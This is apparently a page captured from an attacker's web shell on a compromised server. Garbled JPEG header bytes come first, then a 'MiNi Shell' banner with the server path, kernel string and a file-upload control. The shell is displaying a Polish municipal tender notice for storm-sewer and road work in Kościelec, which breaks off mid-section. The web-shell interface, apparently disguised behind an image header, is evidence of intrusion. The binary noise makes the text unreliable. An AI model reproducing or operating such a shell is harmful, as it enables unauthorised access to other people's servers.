JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220608/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220608/0019881701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Budowa kanalizacji deszczowej wraz z odtworzeniem nawierzchni ulicy Wiatrakowej w miejscowości Kościelec” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Rędziny</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 151398161</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wolności 87</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rędziny</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-242</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL224 - Częstochowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">34 3279085</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ug@redziny.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.redziny.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Budowa kanalizacji deszczowej wraz z odtworzeniem nawierzchni ulicy Wiatrakowej w miejscowości Kościelec” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-24e32f8f-e6f4-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00198817</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00065414/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Budowa kanalizacji deszczowej wraz z odtworzeniem nawierzchni ulicy Wiatrakowej w Kościelcu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.redziny.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://epuap.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja między zamawiającym a wykonawcami odbywa się przy użyciu:<br/>1.1 miniPortalu - który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/ ; <br/>1.2. ePUAPu - dostępnego pod adresem: https://epuap.gov.pl ;<br/>1.3. poczty elektronicznej: ug@redziny.pl <br/>2. Na miniPortalu Zamawiający udostępnia następujące informacje :<br/> tryb, nr postępowania BZP/ Nr referencyjny, tytuł – nazwę postepowania , dane Zamawiającego ,<br/> adres strony www Zamawiającego.<br/> Ogłoszenia publikowane są w BZP , a swz wraz z załącznikami jest zamieszczany na stronie <br/> prowadzonego postepowania https://bip.redziny.pl<br/>3 Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi <br/> posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących <br/> formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz „Formularz do <br/> komunikacji”.<br/>4. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, <br/> elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane <br/> zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej <br/> platformy usług administracji publicznej (ePUAP). <br/>5. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz <br/> złożenia, zmiany, wycofania oferty lub wniosku” i „Formularz do komunikacji”, wynosi 150 MB. <br/>6. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub <br/> elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich <br/> przekazania na ePUAP. <br/>7. Zamawiający przekazuje link do postępowania oraz ID postępowania. <br/> Dane postępowanie można wyszukać również na Liście wszystkich postępowań w miniPortalu, klikając <br/> wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1 Administratorem Pani/Pana danych osobowych jest Gmina Rędziny z siedzibą 42-242 Rędziny, ul. <br/> Wolności 87, tel. 34 3279014, e-mail: ug@redziny.pl .<br/>2 Zamawiający wyznaczył Inspektora Ochrony Danych, z którym kontakt możliwy jest e-mailowo <br/> inspektor@odocn.pl <br/>3 Dane osobowe Wykonawcy przetwarzane będą na podstawie przepisów ustawy z dnia 11 września <br/> 2019 r. Prawo zamówień publicznych (t.j. Dz.U.2019.2019 ze zm.) oraz art. 6 ust. 1 lit. c RODO, w celu <br/> związanym z postępowaniem o udzielenie zamówienia publicznego prowadzonym w trybie przetargu <br/> nieograniczonego<br/>4 Odbiorcami danych osobowych Wykonawcy będą podmioty upoważnione na podstawie przepisów prawa <br/> oraz zawartych umów powierzenia przetwarzania danych osobowych<br/>5 Dane osobowe Wykonawcy będą przechowywane, zgodnie z przepisami ustawy Pzp, przez okres 4 lat od <br/> dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, <br/> okres przechowywania obejmuje cały czas trwania umowy,<br/>6 Obowiązek podania przez Wykonawcę danych osobowych bezpośrednio go dotyczących jest wymogiem <br/> ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie <br/> zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp,<br/> w odniesieniu do danych osobowych Wykonawcy decyzje nie będą podejmowane w sposób <br/> zautomatyzowany, stosowanie do art. 22 RODO,<br/>7 Wykonawca posiada: <br/>•	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących; <br/>•	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych; <br/>•	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; <br/> prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że <br/> przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO,<br/>8 Wykonawcy nie przysługuje: <br/>•	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>•	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>•	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.07.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest budowa kanalizacji deszczowej wraz z odtworzeniem nawierzchni ulicy Wiatrakowej w miejscowości Kościelec. <br/> W ramach tej inwestycji zostanie również wykonany odcinek kanalizacji sanitarnej o długości 40,00 mb <br/> – odejście od istniejącego kanału sanitarnego w ulicy Wolności (studnia 52) do studni nr 52A w ulicy Wiatrakowej.<br/>1. Podstawowe parametry projektowanej kanalizacji deszczowej :<br/>• odcinek z rur Ø 250/7,3 = 54,00 m<br/>• odcinek z rur Ø 250/5,9 = 4,50 m<br/>• studnie rewizyjne PVC Ø 600 = 2 szt.<br/>• wpusty uliczne z rur żelbetowych Ø 500 z osadnikami = 3 szt.<br/>2. Podstawowe parametry odtworzenia nawierzchni drogi :<br/>• powierzchnia jezdni = 575 m2 ;<br/>• powierzchnia pobocza = 135 m2;<br/>• powierzchnia zjazdów = 17 m2<br/>• konstrukcja nawierzchni : <br/>- stabilizacja cementem = 20cm;<br/>- podbudowa z kruszywa = 20cm<br/>- warstwa wiążąca = 8cm<br/>- warstwa ścieralna = 4cm.<br/>3. Podstawowe parametry projektowanego odcinka kanalizacji sanitarnej :<br/>• odcinek z rur PVC Ø 200/5,9 = 40,00 m<br/>• przewiert w rurze stalowej ochronnej Ø 406,4/7,1 = 8,00 m<br/>• przyłącza z rur PVC Ø 160 = 2 szt. = 5,00mb<br/>4. Zakres zamówienia obejmuje wykonanie robót :<br/> 4.1. Roboty drogowe, w tym : <br/>•	roboty rozbiórkowe i przygotowawcze;<br/>•	budowa nawierzchni jezdni ;<br/>•	budowa zjazdów ;<br/>•	utwardzenie poboczy <br/>•	roboty wykończeniowe;<br/> 4.2. Roboty kanalizacyjne, w tym : <br/>•	roboty rozbiórkowe i przygotowawcze;<br/>•	budowa kanału deszczowego ;<br/>•	włączenie do istniejącego kanału deszczowego ;<br/>•	roboty wykończeniowe;<br/> 4.3. Roboty kanalizacyjne – kanalizacja sanitarna , w tym : <br/>•	roboty rozbiórkowe i przygotowawcze;<br/>•	budowa kanału sanitarnego ;<br/>•	budowa przyłączy sanitarnych; <br/>•	włączenie do istniejącego kanału sanitarnego ;<br/>•	roboty wykończeniowe;<br/> 4.4 Kompletna obsługa geodezyjna inwestycji.<br/> 4.5. Projekt czasowej organizacji ruchu </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Kryteriami wyboru oferty najkorzystniejszej będą: <br/> 1. cena ryczałtowa brutto – 95 %;<br/> 2. długość okresu gwarancji – 5 %.<br/>2. Oferty nieodrzucone oceniane będą według wzoru:<br/>2.1 w kryterium „cena oferty” w którym zamawiającemu zależy, aby wykonawca przedstawił jak <br/> najniższą wartość (cena), zostanie zastosowany następujący wzór:<br/><br/>Liczba Cn<br/>zdobytych (C) = ----------- x 100 x waga kryterium 95 %<br/>punktów Cb<br/>Gdzie:<br/>Cn – cena najniższa wśród ofert nie odrzuconych<br/>Cb – cena oferty badanej<br/>100 – wskaźnik stały<br/> 95 – procentowe znaczenie kryterium ceny<br/><br/>Liczba punktów, którą można uzyskać w ramach kryterium cena obliczona zostanie przez podzielenie ceny najniższej z ofert przez cenę ocenianej oferty i pomnożenie tak otrzymanej liczby przez 100 punktów i wagę kryterium, którą ustalono na 95%.<br/> 2.2. w kryterium „długość okresu gwarancji” w którym Zamawiającemu zależy, aby Wykonawca <br/> przedstawił jak najwyższy wskaźnik (długość okresu gwarancji na wykonane roboty budowlane), <br/> przyznana zostanie następująca punktacja:<br/><br/>Liczba Gn<br/>zdobytych (G) = ----------- x 100 x waga kryterium 5 %<br/>punktów Gb<br/>Gdzie:<br/>Gb – długość okresu gwarancji oferty badanej <br/>Gn – długość okresu gwarancji najdłuższy wśród oferty nieodrzuconej <br/>100 – wskaźnik stały<br/> 5 – procentowe znaczenie kryterium ceny<br/><br/>Uwaga 1.<br/>•	Wykonawca zobowiązany jest podać w ofercie długość okresu gwarancji wyrażoną w pełnych miesiącach.<br/>•	Zamawiający zastrzega, iż minimalna długość okresu gwarancji wynosi 60 miesięcy = 5 lat.<br/>•	W przypadku zadeklarowania przez Wykonawcę w ofercie okresu udzielanej gwarancji i rękojmi krótszej niż 60 mcy, Zamawiający traktować będzie taką ofertę jako niezgodną z siwz co skutkować będzie odrzuceniem oferty <br/>•	Wydłużenie okresu gwarancji ponad 60 miesięcy, jest równoznaczne z jednoczesnym wydłużeniem okresu rękojmi. <br/>•	Okres gwarancji i rękojmi jest liczony od daty odbioru końcowego bezusterkowego.<br/>•	W przypadku zadeklarowania przez Wykonawcę w ofercie okresu udzielonej gwarancji i rękojmi dłuższej niż <br/>84 miesiące = 7 lat, Zamawiający do obliczenia przyznanej punktacji przyjmie 84 miesiące . Do umowy natomiast przyjmie okres wskazany w ofercie Wykonawcy.<br/>•	W przypadku niewskazania przez Wykonawcę okresu gwarancji, Zamawiający przyjmie minimalny okres gwarancji tj. 5 lat = 60 miesięcy.<br/>•	Szczegółowe wymagania dot. gwarancji określone zostały w załączniku do projektu umowy.<br/> 3 . Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie największą liczbę punktów (P) <br/> wyliczoną zgodnie z poniższym wzorem:<br/><br/> P = C + G<br/> Gdzie:<br/> P – łączna liczba punktów oferty ocenianej<br/> C – liczba punktów uzyskanych w kryterium „cena oferty”;<br/> G - liczba punktów uzyskanych w kryterium „długość okresu gwarancji jakości”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium kosztu oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">95</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">długość okresu gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp, Zamawiający określa następujące warunki udziału w postępowaniu dotyczące: <br/>1. Zdolności do występowania w obrocie gospodarczym: <br/> Zamawiający nie określa tego warunku. <br/>2 . Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/> Zamawiający nie określa tego warunku. <br/>3. Sytuacji ekonomicznej lub finansowej :<br/> Zamawiający nie określa tego warunku. <br/>4. Zdolności technicznej lub zawodowej :<br/>4.1 Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże posiadanie doświadczenia <br/> niezbędnego do wykonania przedmiotu zamówienia, tj. wykonanie / zakończenie (rozpoczęcie mogło <br/> nastąpić wcześniej) w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres <br/> prowadzenia działalności jest krótszy - w tym okresie co najmniej jednej roboty budowlanej <br/> polegającej na remoncie, przebudowie lub budowie nowej kanalizacji deszczowej lub sanitarnej <br/> o wartości robót co najmniej 300.000,00 zł brutto.<br/> W przypadku robót, których wartość została wyrażona w umowie w innej walucie niż PLN należy dokonać <br/> przeliczenia tej waluty na PLN przy zastosowaniu średniego kursu NBP na dzień zakończenia robót (w przypadku <br/> robót rozliczanych wyłącznie w walutach innych niż PLN).<br/>UWAGA:<br/>W związku z art. 118 ust. 2 ustawy Pzp: „W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.”<br/>4.2 Dysponowanie osobami zdolnymi do wykonania zamówienia, które będą uczestniczyć w wykonywaniu zamówienia <br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże dysponowanie :<br/>•	osobą, która będzie pełnić funkcję kierownika budowy, budowlanej branży instalacyjnej posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych określone przepisami ustawy z dnia 7 lipca 1994 r. Prawo Budowlane. <br/>•	osobą, która będzie pełnić funkcję kierownika robót, budowlanej branży inżynieryjnej posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności drogowej określone przepisami ustawy z dnia 7 lipca 1994 r. Prawo Budowlane. <br/><br/>UWAGA: <br/>Kierownik budowy oraz kierownicy robót powinni posiadać uprawnienia budowlane zgodnie z ustawą z dnia 07 lipca 1994 r. Prawo budowlane (j.t. Dz. U. z 2020 r., poz. 1333) oraz rozporządzeniem Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2019 r., poz. 831) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów. <br/>Zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych. Regulację odrębną stanowią przepisy ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (j.t. Dz. U. z 2020, poz. 220). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności <br/> odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z <br/> informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia <br/> niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie <br/> czynności oraz informacją o podstawie do dysponowania tymi osobami wykonywane – z <br/> wykorzystaniem wzoru określonego w zał. nr 5;<br/> b) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem <br/> terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wraz z <br/> podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te <br/> zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane <br/> należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa <br/> budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne <br/> dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane – z <br/> wykorzystaniem wzoru określonego w zał. nr 6;</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) 